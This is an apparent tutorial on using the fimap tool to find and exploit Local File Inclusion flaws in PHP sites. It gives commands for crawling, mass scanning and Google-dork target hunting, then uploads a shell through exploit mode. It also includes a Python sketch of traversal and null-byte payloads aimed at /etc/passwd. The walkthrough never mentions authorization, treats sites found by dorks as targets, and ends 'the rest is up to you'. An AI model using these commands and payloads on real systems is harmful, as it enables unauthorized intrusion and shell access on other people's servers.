Today I will show you how to use fimap, a tool written in Python, to find and exploit a Local File Inclusion (LFI) vulnerability automatically and end up with a shell on the target system. LFI is an injection flaw in the same family as SQL injection: a request parameter is used, unfiltered, as the file name of an include() or similar call. It is a bug in the web application, not in the web server itself, and it is still found in the wild.
fimap speeds up the work and increases the chance of finding a vulnerable parameter. It automates the whole process and supports scanning a single target, scanning a list of URLs from a file, and scanning targets found with a Google dork.
It can also crawl (harvest) a target website and write the URLs it finds to a list, which you can feed back in later for bulk scanning.
System Requirements:
+ Python 2.7 installed on the system (fimap is a Python 2 tool) https://www.python.org/download/releases/2.7/
+ FIMAP installation https://github.com/Oweoqi/fimap
OK, assuming you already have Python installed, download the latest version of fimap and unzip it into a directory of your choice. Open a command prompt, cd into the directory where fimap.py is located, and run “fimap.py -h” to see the available options.
Most options and arguments belong to one of the modes. There are four basic modes: single scan (-s), mass scan (-m), Google scan (-g) and harvest mode (-H). To run the LFI checks against a single URL you only need to pass the URL; leave the parameter you want tested empty so fimap can inject into it:
COMMAND: fimap.py -s -u http://target-site.com/index2.php?x=
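To make clear what a scan like the one above is actually doing, here is an added example (my own Python 3 sketch, not fimap's code) of the core LFI check: directory-traversal payloads, with and without a trailing null byte, are injected into the tested parameter and each response is checked for /etc/passwd contents or for a PHP include() warning. The target URL is the one from the command above; the two "servers" are constructed stand-ins so the script runs offline, one emulating a vulnerable include($_GET['x'] . '.php') on an old PHP and one the usual allow-list fix. fimap's real checks cover far more payloads and files than this.

```python
"""Added illustration of the checks an LFI scanner automates for one
URL/parameter. Not fimap's code; fimap's own checks are far more extensive."""
import posixpath
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

TRAVERSAL_TARGET = "etc/passwd"

# A real /etc/passwd starts with the root entry (uid 0, gid 0).
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)
# Typical PHP include()/require() warnings when the file does not exist.
PHP_INCLUDE_ERR_RE = re.compile(
    r"failed to open stream|include_path=|No such file or directory", re.IGNORECASE)


def build_payloads(max_depth=6, null_byte=True):
    """Traversal strings of increasing depth. The %00 variant targets old PHP
    (< 5.3.4) where a null byte truncated the path and cut off an appended
    suffix such as '.php'."""
    payloads = []
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + TRAVERSAL_TARGET
        payloads.append(plain)
        if null_byte:
            payloads.append(plain + "%00")
    return payloads


def inject(url, param, payload):
    """Return url with query parameter `param` set to the raw payload
    ('/', '.' and '%' are left unencoded so the server sees exactly this)."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = payload
    return urlunsplit(parts._replace(query=urlencode(query, safe="/%")))


def classify(body):
    """Classify a response body: file contents leaked, include error, or nothing."""
    if PASSWD_RE.search(body):
        return "vulnerable-read"
    if PHP_INCLUDE_ERR_RE.search(body):
        return "include-error"
    return "none"


def probe(url, param, fetch, max_depth=6):
    """Run all payloads through `fetch(url) -> body`; stop at the first file read."""
    result = {"vulnerable": False, "payload": None, "include_error_seen": False}
    for payload in build_payloads(max_depth):
        verdict = classify(fetch(inject(url, param, payload)))
        if verdict == "include-error":
            result["include_error_seen"] = True  # strong hint: input reaches include()
        elif verdict == "vulnerable-read":
            result["vulnerable"] = True
            result["payload"] = payload
            break
    return result


# --- constructed stand-ins for the target, so the example runs offline ------

WEBROOT = "/var/www/html"
FAKE_FS = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                          "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"}


def fake_vulnerable_server(url):
    """Emulates index2.php doing include($_GET['x'] . '.php') on an old PHP
    with null-byte truncation. Constructed for this example."""
    x = dict(parse_qsl(urlsplit(url).query)).get("x", "")  # %00 decodes to "\x00"
    path = x.split("\x00", 1)[0] if "\x00" in x else x + ".php"
    resolved = posixpath.normpath(posixpath.join(WEBROOT, path))
    if resolved in FAKE_FS:
        return FAKE_FS[resolved]
    return ("<b>Warning</b>: include(%s): failed to open stream: "
            "No such file or directory in /var/www/html/index2.php" % path)


def fake_hardened_server(url):
    """Same page with the usual fix: map the parameter through an allow-list
    instead of using it as a path. Constructed for this example."""
    pages = {"home": "<h1>Home</h1>", "about": "<h1>About</h1>"}
    x = dict(parse_qsl(urlsplit(url).query)).get("x", "")
    return pages.get(x, "<h1>Page not found</h1>")


if __name__ == "__main__":
    target = "http://target-site.com/index2.php?x="
    print(probe(target, "x", fake_vulnerable_server))
    print(probe(target, "x", fake_hardened_server))
```

Against the vulnerable stand-in the plain payloads only produce include() warnings (the appended ".php" breaks the path), while the third-level "../../../etc/passwd%00" reads the file; against the allow-list version nothing is found. That difference, an error message that proves the parameter reaches include() followed by a payload that actually reads a file, is essentially what fimap reports as a hit.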
If you are looking at a single target site, first run harvest mode: it crawls the site and collects the URLs (with their parameters) it finds, which increases your chances of finding a vulnerable link.
COMMAND: fimap.py -H -u http://target-site.com/ -w output.txt
Note: you can control how deep the crawler follows links with the “-d <depth>” option, for example a depth of 3:
COMMAND: fimap.py -H -u http://target-site.com/ -d 3 -w output.txt
Now that we have the output file, switch to mass scan mode to test every harvested link. Pass the output.txt from the previous step with -l:
COMMAND: fimap.py -m -l /path/to/list/output.txt
If you want to find targets with Google using a Google dork, switch to Google scan mode and pass the dork as the query:
COMMAND: fimap.py -g -q "<google dork>"
Note: you can tune the Google scan further. “--googlesleep=<milliseconds>” sets the pause between Google requests (so you are not blocked for hammering Google), “-p <n>” how many result pages to go through and “--results=<n>” how many results per page:
COMMAND: fimap.py -g -q "inurl:index2.php?x=" --googlesleep=5000 -p 15 --results=50
fimap stores the results of all your scans in two files on your system: fimap_results (XML) and fimap-log (text). Once a scan has found something, run fimap in exploit mode with “-x” to list the vulnerable targets and pick one to attack:
COMMAND: fimap.py -x
Select the target, then the shell to upload, and check the result.
I have successfully got a shell running on the server. The rest is up to you.
fimap can also scan for RFI (Remote File Inclusion) vulnerabilities; I will cover that in a following article.
The tool is still under development, so follow the project for updates.
It also ships with Kali Linux: http://tools.kali.org/web-applications/fimap